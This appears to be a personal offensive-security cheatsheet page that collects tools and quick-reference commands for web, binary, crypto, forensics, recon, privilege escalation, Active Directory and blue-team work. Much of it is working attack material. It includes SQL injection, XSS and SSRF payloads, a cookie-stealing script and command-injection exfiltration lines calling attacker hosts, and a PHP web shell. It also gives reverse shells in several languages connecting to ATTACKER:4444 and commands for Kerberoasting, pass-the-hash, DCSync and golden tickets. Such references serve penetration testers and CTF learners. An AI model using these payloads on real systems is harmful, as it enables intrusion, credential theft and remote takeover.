Tools & Cheatsheets#

My personal security reference. Tools I reach for and quick-recall content for the techniques I use most. Living document, edited as my workflow shifts. Use the TOC on the right to jump around.

Web Security#

Tools#

Burp Suite Community: proxy + repeater + intruder. Free tier covers most of what I do
ffuf: fast content discovery / wordlist fuzzing
feroxbuster: recursive content discovery, alt to ffuf
sqlmap: automated SQLi
wappalyzer + whatweb + httpx: tech fingerprinting + HTTP probing
gobuster: fallback content discovery
ParamSpider + Arjun: parameter discovery
dalfox: XSS scanner
jwt_tool: JWT analysis and attacks

Content Discovery#

1
ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200,301,302,403
2
feroxbuster -u https://target.com -w wordlist.txt -x php,html,txt
3
gobuster dir -u https://target.com -w wordlist.txt -x php,html,txt

SQL Injection#

Detection:

1
'              -- error?
2
"              -- error?
3
\              -- error?
4
' AND 1=1 --   -- true
5
' AND 1=2 --   -- false

Auth bypass:

1
' OR '1'='1' --
2
admin' --
3
admin' #
4
' OR 1=1 LIMIT 1 --

UNION-based (find column count first):

1
' ORDER BY 1 --
2
' ORDER BY 2 --
3
' UNION SELECT NULL,NULL --
4
' UNION SELECT 1,version() --
5
' UNION SELECT 1,table_name FROM information_schema.tables --

Blind boolean:

1
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1)='a' --

Time-based:

1
' AND SLEEP(5) --                       -- MySQL
2
'; WAITFOR DELAY '0:0:5' --             -- MSSQL
3
' || pg_sleep(5) --                     -- PostgreSQL

NoSQL (MongoDB):

1
// JSON body
2
{"user": {"$ne": null}, "pass": {"$ne": null}}
3
{"user": "admin", "pass": {"$regex": "^a"}}

XSS#

Common payloads:

1
<script>alert(1)</script>
2
<img src=x onerror=alert(1)>
3
<svg/onload=alert(1)>
4
<body onload=alert(1)>
5
<iframe src=javascript:alert(1)>
6
javascript:alert(1)

Filter bypass:

1
<ScRiPt>alert(1)</ScRiPt>
2
<script>alert`1`</script>
3
<svg><script>alert&#40;1&#41;</script></svg>
4
<img src=x onerror="alert(1)">
5
<a href=javas&#99;ript:alert(1)>x</a>

Cookie steal (testing):

1
<script>new Image().src='https://attacker/?c='+document.cookie</script>

SSRF#

Cloud metadata probes:

1
http://169.254.169.254/latest/meta-data/         # AWS
2
http://169.254.169.254/latest/meta-data/iam/security-credentials/
3
http://metadata.google.internal/                 # GCP
4
http://169.254.169.254/metadata/v1/              # DigitalOcean
5
http://169.254.169.254/metadata/instance?api-version=2017-08-01  # Azure

Bypass tricks:

1
http://127.0.0.1
2
http://localhost
3
http://[::1]
4
http://0.0.0.0
5
http://2130706433/         # decimal of 127.0.0.1
6
http://0x7f.0x0.0x0.0x1/   # hex
7
http://internal.target.com.attacker.com/  # DNS rebinding

File Upload#

Extension bypass:

1
shell.php.jpg
2
shell.pHp
3
shell.php5 / .phtml / .phar
4
shell.php%00.jpg
5
shell.jpg (with PHP in EXIF + .htaccess override)

Content-Type spoofing: swap header to image/jpeg while body is PHP.

LFI / RFI#

1
?file=../../../../etc/passwd
2
?file=....//....//....//etc/passwd
3
?file=/etc/passwd%00
4
?file=php://filter/convert.base64-encode/resource=index
5
?file=data://text/plain,<?php system($_GET['c']); ?>
6
?file=expect://id

Log poisoning (Apache access.log via User-Agent):

1
User-Agent: <?php system($_GET['c']); ?>
2
Then: ?file=/var/log/apache2/access.log&c=id

Command Injection#

1
; id
2
| id
3
& id
4
&& id
5
`id`
6
$(id)
7
$IFS$1id     # space-less
8
{id,}        # brace expansion

Blind exfil:

1
; curl attacker.com/$(whoami)
2
; ping -c 1 $(whoami).attacker.com

JWT#

none algorithm attack:

1
Header: {"alg":"none","typ":"JWT"}
2
Payload: {"user":"admin"}
3
Signature: (empty)

HS256 / RS256 confusion: sign with the public key as HMAC secret.

Tool:

1
jwt_tool TOKEN -T          # tamper interactively
2
jwt_tool TOKEN -X a        # alg=none
3
jwt_tool TOKEN -C -d wl.txt  # crack secret with wordlist

XXE#

1
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
2
<foo>&xxe;</foo>
3

4
<!-- Blind / OOB -->
5
<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://attacker/evil.dtd"> %ext;]>

Pwn & RE#

Tools#

pwntools: Python exploitation framework
Ghidra: NSA’s free RE suite for static analysis
GDB + pwndbg / gef: dynamic debugging with security extensions
radare2 / Cutter: alternate RE flow
ROPgadget + ropper: gadget hunting
one_gadget: libc one-shot gadgets
angr: symbolic execution
objdump / readelf / nm / file / strings: classic Unix tools

Binary inspection#

1
file binary
2
checksec --file=binary        # NX, PIE, RELRO, Canary, Fortify
3
strings -n 8 binary
4
readelf -a binary
5
objdump -d binary | less
6
nm binary | grep -i flag

pwntools template#

1
from pwn import *
2

3
context.binary = exe = ELF('./chal')
4
context.log_level = 'debug'
5
libc = ELF('./libc.so.6')
6

7
def conn():
8
    if args.REMOTE:
9
        return remote('host', 1337)
10
    if args.GDB:
11
        return gdb.debug(exe.path, gdbscript='b *main+0x42\ncontinue')
12
    return process(exe.path)
13

14
p = conn()
15
p.recvuntil(b'> ')
16
payload = flat({
17
    72: [exe.sym.win, 0xdeadbeef]
18
})
19
p.sendline(payload)
20
p.interactive()

ROP basics#

1
# Build chain
2
rop = ROP(exe)
3
rop.raw(b'A' * 72)
4
rop.call('puts', [exe.got['puts']])
5
rop.call('main')
6

7
# Calculate libc base from leaked puts
8
leak = u64(p.recvline().strip().ljust(8, b'\x00'))
9
libc.address = leak - libc.sym.puts
10
log.info(f'libc base: {hex(libc.address)}')

Format string#

1
# Leak: %p, %x, %s, %N$p
2
fmt = b'%7$p.%8$p.%9$p'
3

4
# Arbitrary write: %hn / %hhn at target address
5
from pwn import fmtstr_payload
6
payload = fmtstr_payload(offset, {exe.got['exit']: exe.sym.win})

Common protections + bypass#

Protection	Bypass
NX (no exec stack)	ROP / ret2libc
ASLR	leak libc/stack address first
PIE	leak binary base from GOT/PLT
Stack Canary	leak the canary (format string, partial overwrite)
RELRO Full	can’t overwrite GOT, target other writable funcs
Fortify	bypass via lower-level writes

GDB / pwndbg shortcuts#

1
checksec       view protections
2
vmmap          memory layout
3
got            GOT entries
4
plt            PLT entries
5
search "str"   find string in memory
6
context        full debug view
7
heap           heap chunks
8
bins           tcache/fastbin/unsorted state
9
b *main+0x42   break at offset
10
x/100gx $rsp   dump 100 qwords from stack

Crypto#

Tools#

CyberChef: swiss army knife for encoding / decoding / hashing
Python + pycryptodome: real implementations
z3-solver: constraint solver
SageMath: lattices, ECC, finite fields, polynomial rings
hashcat + john: hash cracking
RsaCtfTool: automates common RSA attacks

Hash identification by length (hex)#

1
32 chars   MD5 / NTLM / MD4
2
40 chars   SHA-1
3
56 chars   SHA-224
4
64 chars   SHA-256
5
96 chars   SHA-384
6
128 chars  SHA-512

Hash cracking#

1
# Identify
2
hashid hash.txt
3
hash-identifier
4

5
# Crack with hashcat (mode examples)
6
hashcat -m 0 hash.txt rockyou.txt        # MD5
7
hashcat -m 100 hash.txt rockyou.txt      # SHA-1
8
hashcat -m 1400 hash.txt rockyou.txt     # SHA-256
9
hashcat -m 1800 hash.txt rockyou.txt     # bcrypt
10
hashcat -m 16500 jwt.txt rockyou.txt     # JWT HS256
11

12
# john
13
john --wordlist=rockyou.txt hash.txt
14
john --format=raw-sha256 hash.txt

Classical ciphers (Python solvers)#

Caesar / ROT-N brute:

1
ct = "uryyb"
2
for k in range(26):
3
    pt = ''.join(chr((ord(c)-97-k)%26+97) if c.isalpha() else c for c in ct.lower())
4
    print(k, pt)

Vigenere (with known key):

1
def vig_dec(ct, key):
2
    out = ''
3
    for i, c in enumerate(ct):
4
        if c.isalpha():
5
            shift = ord(key[i % len(key)].lower()) - 97
6
            out += chr((ord(c.lower()) - 97 - shift) % 26 + 97)
7
        else:
8
            out += c
9
    return out

RSA attacks#

Small e (e=3) and small message:

1
from gmpy2 import iroot
2
m, _ = iroot(c, e)

Common modulus (same N, different e1/e2, gcd(e1,e2)=1):

1
from sympy import gcdex
2
g, s, t = gcdex(e1, e2)
3
m = (pow(c1, s, N) * pow(c2, t, N)) % N

Wiener (small d): use owiener Python lib.

Fermat (close p,q): try from sympy.ntheory import isqrt and iterate.

AES gotchas#

ECB: identical plaintext blocks produce identical ciphertext. Visible in image encryption.
CBC bit-flipping: flipping bit in ciphertext block N flips same bit in plaintext block N+1.
Padding oracle: server leaks “bad padding” lets you decrypt CBC byte-by-byte.

Modular arithmetic quick wins#

1
pow(a, -1, n)        # modular inverse (Python 3.8+)
2
pow(base, exp, mod)  # fast modular exponentiation
3
from math import gcd
4
from sympy import isprime, nextprime, factorint

Forensics & Stego#

Tools#

Volatility3 (vol alias): memory forensics
Autopsy + Sleuthkit: disk forensics GUI + CLI
binwalk: embedded file extraction
steghide + zsteg + stegsolve: image / audio steg
exiftool: metadata
Wireshark + tshark: pcap analysis
foremost + scalpel: file carving
bulk_extractor: artifact extraction at scale

Volatility3 plugins (Windows)#

1
vol -f mem.raw windows.info
2
vol -f mem.raw windows.pslist
3
vol -f mem.raw windows.pstree
4
vol -f mem.raw windows.netscan
5
vol -f mem.raw windows.netstat
6
vol -f mem.raw windows.cmdline
7
vol -f mem.raw windows.filescan
8
vol -f mem.raw windows.dumpfiles --virtaddr 0xXXXX
9
vol -f mem.raw windows.malfind
10
vol -f mem.raw windows.hashdump
11
vol -f mem.raw windows.registry.hivelist

Volatility3 (Linux)#

1
vol -f mem.raw linux.bash
2
vol -f mem.raw linux.pslist
3
vol -f mem.raw linux.psaux
4
vol -f mem.raw linux.lsof
5
vol -f mem.raw linux.lsmod

Stego workflow#

1
file image.png
2
exiftool image.png
3
strings -n 8 image.png | tail
4
binwalk image.png
5
binwalk -e image.png         # extract embedded files
6
zsteg image.png              # LSB on PNG
7
zsteg -a image.png
8
steghide extract -sf image.jpg -p ""  # try empty password
9
stegseek image.jpg rockyou.txt        # brute steghide password

File carving#

1
foremost -i disk.dd -o output/
2
scalpel -c scalpel.conf disk.dd
3
binwalk -e firmware.bin

Network forensics (Wireshark filters)#

1
http.request.method == "POST"
2
ip.addr == 10.0.0.1 && tcp.port == 4444
3
tcp.stream eq 5
4
http contains "password"
5
dns.qry.name contains "evil"
6
ssl.handshake.extensions_server_name == "target.com"
7
frame contains "flag{"

1
tshark -r capture.pcap -Y 'http.request' -T fields -e http.request.uri
2
tshark -r capture.pcap -z conv,tcp
3
tshark -r capture.pcap --export-objects http,output_dir/

Recon / OSINT#

Tools#

amass + subfinder: subdomain enumeration
crt.sh (web): certificate transparency
RECOG.py: my own pipeline (projects)
theHarvester: email + domain OSINT
Sherlock + WhatsMyName: username enumeration
Maltego CE: visual link analysis (free tier)
nuclei: templated vulnerability scanning
shodan (CLI): exposed asset search
GitHub dorks / trufflehog: secret discovery in code

Subdomain enum#

1
subfinder -d target.com -silent
2
amass enum -passive -d target.com
3
assetfinder --subs-only target.com
4
curl -s "https://crt.sh/?q=%25.target.com&output=json" \
5
  | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
6
findomain -t target.com
7
chaos -d target.com    # ProjectDiscovery's chaos DB

Live host filtering#

1
cat subs.txt | httpx -silent -status-code -title -tech-detect
2
cat subs.txt | httpx -silent -mc 200,403 | tee live.txt

Port scanning#

1
nmap -sV -sC -p- --min-rate 1000 target.com -oA scan
2
nmap --script=vuln target.com
3
masscan -p1-65535 --rate=10000 10.0.0.0/24 -oG masscan.gnmap
4
naabu -host target.com -p -            # full range
5
rustscan -a target.com -- -sV -sC      # fast then nmap

Web tech fingerprinting#

1
whatweb https://target.com
2
wappalyzer-cli https://target.com
3
httpx -u target.com -tech-detect

Google dorks#

1
site:target.com -www
2
site:target.com inurl:admin
3
site:target.com filetype:pdf
4
site:target.com intext:"password"
5
site:github.com "target.com" "api_key"

Username enumeration#

1
sherlock 0xkakashi
2
maigret 0xkakashi --html

Metadata#

1
exiftool file.pdf
2
exiftool -all= file.pdf       # strip metadata (sanitize before sharing!)

DNS / WHOIS#

1
dig +short target.com
2
dig +short MX target.com
3
dig +short TXT target.com
4
dig +short AXFR target.com @ns1.target.com   # zone transfer attempt
5
whois target.com
6
dnsenum target.com

Reverse Shells#

bash / sh#

1
bash -i >& /dev/tcp/ATTACKER/4444 0>&1
2
0<&196;exec 196<>/dev/tcp/ATTACKER/4444; sh <&196 >&196 2>&196
3
sh -i 5<> /dev/tcp/ATTACKER/4444 0<&5 1>&5 2>&5

Python#

1
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'

Netcat#

1
nc -e /bin/bash ATTACKER 4444                    # if -e is available
2
mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER 4444 > /tmp/f   # without -e

PHP#

1
<?php exec("bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'"); ?>
2
<?php system($_GET['c']); ?>

PowerShell#

1
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Listener (your side)#

1
nc -lvnp 4444
2
rlwrap nc -lvnp 4444          # with line editing
3
pwncat-cs -lp 4444            # better experience, auto-upgrade pty

Stabilize the shell#

1
python3 -c 'import pty; pty.spawn("/bin/bash")'
2
# Then Ctrl+Z, on host:
3
stty raw -echo; fg
4
# Inside shell:
5
export TERM=xterm
6
stty rows 38 columns 116

Privilege Escalation#

Linux enumeration#

1
# Auto enum
2
linpeas.sh
3
lse.sh -l 2
4
linux-exploit-suggester.sh
5

6
# Manual quick wins
7
id
8
sudo -l
9
find / -perm -4000 -type f 2>/dev/null    # SUID binaries
10
find / -perm -2000 -type f 2>/dev/null    # SGID
11
getcap -r / 2>/dev/null                   # capabilities
12
crontab -l && cat /etc/crontab && ls -la /etc/cron.*
13
cat /etc/passwd | grep -v false | grep -v nologin
14
ls -la /home /root /opt
15
mount
16
ps auxf
17
netstat -tulpn

Linux escalation paths#

sudo misconfig: check sudo -l, look up the binary on GTFOBins
SUID/SGID: same, find on GTFOBins
Writable cron / systemd timer: edit a script that runs as root
PATH hijack: when a root script calls a binary without absolute path
Kernel exploit: last resort, check uname -a against linux-exploit-suggester
Capabilities: cap_setuid on a binary lets you become root with the right call
NFS no_root_squash: mount remote share, drop SUID binary
Docker / lxd / disk group: privesc-by-design if user is in these groups

Windows enumeration#

1
# Auto enum
2
winpeas.exe
3
PowerUp.ps1; Invoke-AllChecks
4
Seatbelt.exe -group=all
5

6
# Manual quick wins
7
whoami /all
8
systeminfo
9
net user / net localgroup
10
netstat -ano
11
schtasks /query /fo LIST /v
12
wmic service get name,pathname,startname | findstr /v "Windows"

Windows escalation paths#

Unquoted service path: service points to C:\Program Files\Foo\bar.exe without quotes
Service binary writable: replace the service .exe
AlwaysInstallElevated: registry flag lets MSI install as SYSTEM
Stored credentials: cmdkey /list, scheduled task XMLs, group policy preferences
Token impersonation: SeImpersonate / SeAssignPrimaryToken with JuicyPotato, PrintSpoofer, RoguePotato
DLL hijack: drop malicious DLL in a path searched before the legit one
Kernel exploits: check patch level vs known CVEs

Active Directory#

Recon#

1
# From Linux attack box
2
nxc smb DC.lab.local -u user -p pass --shares
3
nxc smb DC.lab.local -u user -p pass --rid-brute
4
ldapsearch -x -H ldap://DC.lab.local -b "dc=lab,dc=local"
5
enum4linux -a DC.lab.local

Kerberoasting#

1
# Request service tickets for accounts with SPNs, crack offline
2
GetUserSPNs.py lab.local/user:pass -dc-ip 10.0.0.1 -request
3
hashcat -m 13100 hashes.txt rockyou.txt

AS-REP roasting#

1
# Accounts with Kerberos preauth disabled, no creds needed
2
GetNPUsers.py lab.local/ -no-pass -usersfile users.txt -dc-ip 10.0.0.1
3
hashcat -m 18200 hashes.txt rockyou.txt

Pass-the-hash / Pass-the-ticket#

1
nxc smb 10.0.0.0/24 -u admin -H NTLM_HASH                 # PtH spray
2
psexec.py lab.local/admin@DC -hashes :NTLM_HASH           # PtH exec
3
export KRB5CCNAME=ticket.ccache && klist                  # PtT

BloodHound essentials#

1
# Collect
2
bloodhound-python -u user -p pass -d lab.local -ns 10.0.0.1 -c All
3
# Or SharpHound.exe from Windows host
4

5
# Common queries (Cypher in BH GUI)
6
MATCH (u:User {enabled:true}) WHERE u.dontreqpreauth=true RETURN u   # AS-REP roastable
7
MATCH (u:User) WHERE u.hasspn=true RETURN u                          # Kerberoastable
8
MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@LAB.LOCAL"})) RETURN p

DCSync#

1
# Requires Replicating Directory Changes privilege
2
secretsdump.py lab.local/admin:pass@DC -just-dc-user krbtgt
3
secretsdump.py -no-pass -k -dc-ip 10.0.0.1 lab.local/admin@DC

Golden / Silver tickets#

1
# Golden: requires krbtgt hash
2
ticketer.py -nthash KRBTGT_NT -domain-sid S-1-5-21-... -domain lab.local Administrator
3
export KRB5CCNAME=Administrator.ccache
4
psexec.py -k -no-pass lab.local/Administrator@DC

Blue Team / SOC#

Tools#

Splunk: log analysis
Wireshark: packet analysis
Suricata + Snort: IDS rule writing
YARA: malware pattern matching
Velociraptor: endpoint hunting / DFIR
MISP: threat intel sharing
Sigma: vendor-neutral detection rules
TheHive + Cortex: SOC case management + observable analysis
CyberChef: log decoding and IoC extraction

Splunk SPL essentials#

1
# Auth fails by user
2
index=auth action=failure
3
| stats count by user
4
| where count > 10
5

6
# Beaconing detection (constant interval)
7
index=network
8
| stats count, dc(_time) AS distinct_times, range(_time) AS span by src, dest
9
| eval beacon_score = span / count
10
| where count > 50 AND beacon_score < 60
11

12
# Process spawn anomalies
13
index=endpoint sourcetype=Sysmon EventCode=1
14
| rare ParentImage, Image
15

16
# Geographically impossible logins
17
index=auth
18
| iplocation src_ip
19
| streamstats current=f window=1 last(City) AS prev_city last(_time) AS prev_time by user
20
| where City != prev_city AND (_time - prev_time) < 3600

Sigma rule template#

1
title: Suspicious PowerShell Encoded Command
2
id: 1234-abcd
3
status: experimental
4
description: Detects PowerShell with encoded command flag
5
logsource:
6
    product: windows
7
    service: sysmon
8
detection:
9
    selection:
10
        EventID: 1
11
        Image|endswith: '\powershell.exe'
12
        CommandLine|contains: '-EncodedCommand'
13
    condition: selection
14
falsepositives:
15
    - Legitimate admin scripts
16
level: medium

YARA templates#

String-based:

1
rule suspicious_powershell {
2
    meta:
3
        author = "0xkakashi"
4
        description = "PowerShell with common malicious patterns"
5
    strings:
6
        $a = "Invoke-Expression" nocase
7
        $b = "DownloadString" nocase
8
        $c = "FromBase64String" nocase
9
        $d = "Bypass" nocase
10
    condition:
11
        2 of them
12
}

Byte-based (PE detection):

1
rule pe_file {
2
    strings:
3
        $mz = { 4D 5A }       // MZ header
4
        $pe = { 50 45 00 00 } // PE\0\0
5
    condition:
6
        $mz at 0 and $pe
7
}

Suricata rule template#

1
alert http any any -> any any (msg:"Possible web shell upload";
2
  flow:established,to_server;
3
  http.method; content:"POST";
4
  http.uri; content:".php"; nocase;
5
  http.request_body; content:"<?php";
6
  classtype:web-application-attack;
7
  sid:1000001; rev:1;)

Windows Event IDs to know#

ID	Description
4624	Successful logon
4625	Failed logon
4634	Logoff
4648	Logon with explicit credentials
4672	Special privileges assigned
4688	Process creation
4720	Account created
4724	Password reset
4768	TGT requested (Kerberos)
4769	Service ticket requested
4776	NTLM auth
5140	Network share accessed
7045	Service installed

MITRE ATT&CK quick categories#

TA0001 Initial Access (phishing, valid accounts)
TA0002 Execution (PowerShell, scripts)
TA0003 Persistence (scheduled tasks, registry run keys)
TA0004 Privilege Escalation
TA0005 Defense Evasion (obfuscation, signed binary proxy)
TA0006 Credential Access (LSASS dump, kerberoasting)
TA0007 Discovery
TA0008 Lateral Movement (PsExec, RDP, SMB)
TA0009 Collection
TA0010 Exfiltration
TA0011 Command and Control (DNS tunneling, beaconing)

My Setup#

Kakashi-themed Kali Linux 2025.4 with full toolkit. Custom ZSH prompt, fastfetch with Kakashi braille art, themed btop / bat / lsd. Aliases I actually use:

1
cat   -> batcat
2
ls    -> lsd
3
top   -> btop
4
vol   -> volatility3
5
fetch -> fastfetch

Full setup details in /now and on the About page.

References#

When I need to look something up beyond what’s here, I check these first. All free, well-maintained, far deeper than this page:

HackTricks by Carlos Polop, the everything reference for offensive security
PayloadsAllTheThings by swisskyrepo, payload database for every web vuln class
OWASP Cheat Sheet Series, defensive guidance, well-vetted
GTFOBins, Linux binaries useful for privesc / restricted shells
LOLBAS, Windows living-off-the-land binaries
Pwntools docs, syntax reference
Crypto++ wiki, cryptography algorithm references
explainshell.com, decode obscure bash one-liners
CyberChef, encoding / decoding workbench
MITRE ATT&CK, adversary tactics, techniques, and procedures
SANS Cheat Sheets, free PDFs for forensics, IR, threat hunting
InfoSec Notes, community-maintained CTF refs

The above are the canonical sources. The content on this page is my own distilled notes for what I actually reach for from memory. For depth, follow the links.